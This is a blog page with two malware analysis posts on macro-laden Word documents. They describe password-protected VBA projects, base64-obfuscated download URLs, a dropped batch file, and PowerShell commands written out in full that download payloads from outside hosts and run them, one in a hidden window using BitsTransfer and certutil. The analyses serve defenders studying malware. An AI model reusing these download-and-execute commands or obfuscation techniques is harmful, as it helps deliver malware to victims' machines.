Tag: Word Macro Malware

Word Macro Malware Analysis

Anurag GawandeLeave a comment

SHA256: dd81d70fa14f0e95b8cd2fe86a9a21a264cbb4bb32d80c4195fc13ee6791b994

Sample Link: Beta.VirusBay.io

File Type: Microsoft Word

File Extension: .doc

VirusTotal Score 29/61

I am going to use OLETools to analyse this word document sample. For initial document analysis I rely on this tool, if

you have read my earlier blog posts on word macro analysis, you can see I have used this tool. 

>>oleid.py <word document file>

Word document property
>>olevba.py -a <word document file>
VBA macro analysis

VBA macro analysis:

  • Macro will execute on document open.
  • It may open/write binary file on the system
  • It has hex strings
  • It has base64 obfuscated strings.

I can deobfuscate the base64 obfuscated base64 string using oldvba command

>>olevba.py --decode <word document file>

but I would open VBA developer tool and debug the VBA code.

To view macros navigate to View >> Macros >> View Macros

Macro windows

There is no macro available to Step into because macro is password protected.

Open VBA developer tool by pressing Alt+F11

To remove password, I will use code written by ndthanh link to the code is here Github

To use this code, right clicked on Project >> Insert >> Module it will open empty code window, copy paste code here.

Click on Run >> (Macro Name) unprotected

and password is removed and project is unlocked.

Document_Open() executes on opening word document.

VBA has forms and modules.

Forms

  • pfoi23hj
  • roihwo23

Macro Modules

  • ajbhk3h43
  • bcsjw
  • bklern4jh
CommandButton1() is auto executable

I put a breakpoint and started debugging modules and got the list of URL’s it tries to connect

URLs are obfuscated base64 strings

URLs Obfuscated base64 strings

  • aHR0cDovL3NhbHdhZG0uY29tL3RjcGh4Lzg4ODg4ODgucG5n
  • aHR0cDovL2ZsaXBrZW55YS5jb20vbnVqYXpid3JoankvODg4ODg4OC5wbmc=
  • aHR0cDovLzEweDQ1LmNvbS96ZmJqdnZxeGt0eC84ODg4ODg4LnBuZw==
  • aHR0cDovL2lhbXBsb3llZC5ubC9sYmJpdWpkeWp5Lzg4ODg4ODgucG5n
  • aHR0cDovL2FwdG9jaXVkYWRhbXVyYWxsYWRhY2FydGFnZW5hLmNvbS9nZGRxZXovODg4ODg4OC5wbmc=
  • aHR0cDovL2F1dG9lc2NvbGFjaWdhbm9zLmNvbS5ici9nZXp6Zi84ODg4ODg4LnBuZw==

After deofuscated base64 URLs

http://salwadm . com/tcphx/8888888.pngVT Score
http://flipkenya . com/nujazbwrhjy/8888888.pngVT Score
http://10×45 . com/zfbjvvqxktx/8888888.pngVT Score
http://iamployed . nl/lbbiujdyjy/8888888.pngVT Score
http://aptociudadamuralladacartagena . com/gddqez/8888888.pngVT Score
http://autoescolaciganos . com . br/gezzf/8888888.pngVT Score

Code also drops BAT file tmp.bat and execute it to create a directory tmpdir at location C:\Users\Public\

location C:\Users\Public where bat file dropped

Next code deobfuscate string by replacing a letter by its preceding letter. E.g. ‘Q’ will be replaced with ‘P’

PowerShell command

Below is the PowerShell Command with obfuscated string

powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL3NhbHdhZG0uY29tL3RjcGh4Lzg4ODg4ODgucG5n')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e')

Deobfuscated base64 string

powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('http://salwadm . com/tcphx/8888888.png')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('C:\Users\Public\tmpdir\file')) + '1' + '.e' + 'x' + 'e')

PowerShell script download an executable file file1.exe from the URL. After taking closer look at this file, its a html page with .exe extension.

File downloaded by PowerShell script

I have uploaded this file to VirusTotal and the was zero detection as malware.

SHA256: 3b11440abf602e0ac35a8a1489ed26ec0103ed2ba636520761c698e5fb2df9d1

VirusTotal score link here

Summary:

  • On document opening, forms execute.
  • Drops bat file which create a folder on victim’s machine
  • Executes PowerShell script which downloads a file from one of the multiple sources of URLs.
  • Look for antivirus protection, real time protection values in registry.

Word Macro Malware Analysis

Anurag Gawande4 Comments

Hash: 98fe0b166f550446cbf9e0f368eb8bea79d2eec29fa033cee1ff8f8e38a12836

Sample Download Source: beta.virusbay.io

File Type: Microsoft Word Document

File Format: .doc

VirusTotal Scrore: 32/62

Document Preview:

Blg16_08052020_3

File Property:

cmd> olemeta.py <filename>
Blg16_08052020_8

Document Macro Analysis:

cmd> olevba.py -a <filename>

Document_Open macro executes on opening document.

Blg16_08052020_1

The first thing I was trying to access Macro. By default it was disabled, to enable it go to Files > Options > Trust Center > Macro Settings > Select Enable all macros and select checkbox Trust access to the VBA project object mode

Blg16_08052020_9

Post enabling macro, I navigate to View > Macros > View Macros 

There are macros in document.

Blg16_08052020_10

I tried to step into Document_Open macro which executes on document open. But I got an error Project Locked and Project is unenviable.

Blg16_08052020_11

To make it viewable, I downloaded tool EvilClippy. This tool create new copy of word document in same directory as your current document.

Blg16_08052020_12

Now when I open document which is project viewable and open VBA Development tool by pressing F11 and tried to open macro code, I was getting Project Password prompt.

Blg16_08052020_13

To remove/bypass this password, there is a VBA code, Git hub link

I am going to create a new module and paste this code there and run the macro unprotected

Blg16_08052020_14

Debugging Macro

I started debugging macro code and found below code runs PowerShell command

Blg16_08052020_15

PowerShell that written to location C:\Users\<profile>\AppData\Roaming\Temp\

Blg16_08052020_16

PowerShell command that executes via command line.

powershell -windowstyle hidden -command Import-Module BitsTransfer; Start-BitsTransfer -Source http://neoneo-bg.site/hIeak.dat,http://neoneo-bg.site/geTask.dat,http://neoneo-bg.site/rTTj.dat -Destination \"$env:TEMP\vido.com\",\"$env:TEMP\sfera\",\"$env:TEMP\rTTj.com\"; Set-Location -Path \"$env:TEMP\"; certutil -decode sfera po15p; Start-Process vido.com -ArgumentList po15p

PowerShell connects to the below URLS and save files vido.com, rTTj.com and sfera to location C:\Users\<user>\AppData\Local\Temp

I tried to debug the PowerShell script but the URL is no more accessible. Sadly, I couldn’t download the files those gonna download by this script.

http://neoneo-bg.site/hIeak.dat

VirusTotal Score: 5/71

Blg16_08052020_18

http://neoneo-bg.site/geTask.dat

VirusTotal Score: 7/71

Blg16_08052020_19

http://neoneo-bg.site/rTTj.dat

VirusTotal Score: 5/71

Blg16_08052020_20

Summary:

  • On opening document, word macro executes PowerShell command.
  • PowerShell command downloads file to Temp folder.

Thank you. Please post comments for suggestions.